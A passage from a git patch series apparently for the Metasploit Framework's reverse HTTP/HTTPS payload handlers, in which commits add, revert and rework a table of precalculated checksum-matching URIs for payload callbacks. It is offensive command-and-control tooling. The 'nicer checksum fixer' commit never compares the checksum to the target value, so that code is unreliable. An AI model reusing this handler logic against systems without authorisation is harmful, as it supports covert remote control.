"mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -65,11 +70,15 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) + + # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) + uri = Rex::Text.rand_text_alphanumeric(5) return uri if Rex::Text.checksum8(uri) == sum end - raise RuntimeError, "Unable to generate a string with checksum #{sum}" + + # Otherwise return one of the pre-calculated strings + return URI_CHECKSUM_PRECALC[sum] end # diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index a8148a88f3..dd697713c3 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -37,6 +37,11 @@ module ReverseHttps URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 + # + # Precalculated checkums as fallback + # + URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -66,11 +71,15 @@ module ReverseHttps # Create a URI that matches a given checksum # def generate_uri_checksum(sum) + + # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) + uri = Rex::Text.rand_text_alphanumeric(5) return uri if Rex::Text.checksum8(uri) == sum end - raise RuntimeError, "Unable to generate a string with checksum #{sum}" + + # Otherwise return one of the pre-calculated strings + return URI_CHECKSUM_PRECALC[sum] end # From 9fad028d8a260eeb1befe2b325636a92be53434d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 11:59:29 -0500 Subject: [PATCH 14/46] A nicer checksum fixer Just use a checksum digit like a cc#, no need for precalculated lists, will be correct every time. --- lib/msf/core/handler/reverse_https.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index a8148a88f3..0867ef01dc 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -61,18 +61,21 @@ module ReverseHttps uri_match end - + # # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) - return uri if Rex::Text.checksum8(uri) == sum + urix = nil + uri = Rex::Text.rand_text_alphanumeric(3) + ("a".."z").sort_by {rand}.each do |x| + urix = (uri + x) if Rex::Text.checksum8(uri + x) + break if urix end + return urix if urix raise RuntimeError, "Unable to generate a string with checksum #{sum}" end - + # # Initializes the HTTP SSL tunneling handler. # From 93244f2dc88038774f650315c42492977a18a2f4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 12:22:19 -0500 Subject: [PATCH 15/46] Revert "Precalculate some uri strings in case the 1000-round generation fails" This reverts commit 7161a548f4259032f5cef8d97f38915aaa6344db. Prepping for a more sane solution that doesn't change the URI sizes and succeeds without fallingback to a pre-generated list. --- lib/msf/core/handler/reverse_http.rb | 15 +++------------ lib/msf/core/handler/reverse_https.rb | 13 ++----------- 2 files changed, 5 insertions(+), 23 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index fe1a7d78a9..dc241353cc 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -36,12 +36,7 @@ module ReverseHttp URI_CHECKSUM_INITW = 92 URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - - # - # Precalculated checkums as fallback - # - URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] - + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -70,15 +65,11 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - - # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(5) + uri = Rex::Text.rand_text_alphanumeric(4) return uri if Rex::Text.checksum8(uri) == sum end - - # Otherwise return one of the pre-calculated strings - return URI_CHECKSUM_PRECALC[sum] + raise RuntimeError, "Unable to generate a string with checksum #{sum}" end # diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index dd697713c3..a8148a88f3 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -37,11 +37,6 @@ module ReverseHttps URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - # - # Precalculated checkums as fallback - # - URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] - # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -71,15 +66,11 @@ module ReverseHttps # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - - # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(5) + uri = Rex::Text.rand_text_alphanumeric(4) return uri if Rex::Text.checksum8(uri) == sum end - - # Otherwise return one of the pre-calculated strings - return URI_CHECKSUM_PRECALC[sum] + raise RuntimeError, "Unable to generate a string with checksum #{sum}" end # From 27d3f490f76e9fa2d603960c635effb62e731606 Mon Sep 17 00:00:00 2001 From: hdm Date: Mon, 26 Mar 2012 11:49:51 -0500 Subject: [PATCH 16/46] Precalculate some uri strings in case the 1000-round generation fails --- lib/msf/core/handler/reverse_http.rb | 15 ++++++++++++--- lib/msf/core/handler/reverse_https.rb | 5 +++++ 2 files changed, 17 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index dc241353cc..fe1a7d78a9 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -36,7 +36,12 @@ module ReverseHttp URI_CHECKSUM_INITW = 92 URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - + + # + # Precalculated checkums as fallback + # + URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -65,11 +70,15 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) + + # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) + uri = Rex::Text.rand_text_alphanumeric(5) return uri if Rex::Text.checksum8(uri) == sum end - raise RuntimeError, "Unable to generate a string with checksum #{sum}" + + # Otherwise return one of the pre-calculated strings + return URI_CHECKSUM_PRECALC[sum] end # diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 0867ef01dc..b873a279d3 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -37,6 +37,11 @@ module ReverseHttps URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 + # + # Precalculated checkums as fallback + # + URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. From 899c6529c3a9fa6a9aa3997d0e37a29817fe8214 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 12:22:19 -0500 Subject: [PATCH 17/46] Revert "Precalculate some uri strings in case the 1000-round generation fails" This reverts commit 7161a548f4259032f5cef8d97f38915aaa6344db. Prepping for a more sane solution that doesn't change the URI sizes and succeeds without fallingback to a pre-generated list. --- lib/msf/core/handler/reverse_http.rb | 15 +++------------ lib/msf/core/handler/reverse_https.rb | 5 ----- 2 files changed, 3 insertions(+), 17 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index fe1a7d78a9..dc241353cc 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -36,12 +36,7 @@ module ReverseHttp URI_CHECKSUM_INITW = 92 URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - - # - # Precalculated checkums as fallback - # - URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] - + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -70,15 +65,11 @@ module ReverseHttp # Create a URI that 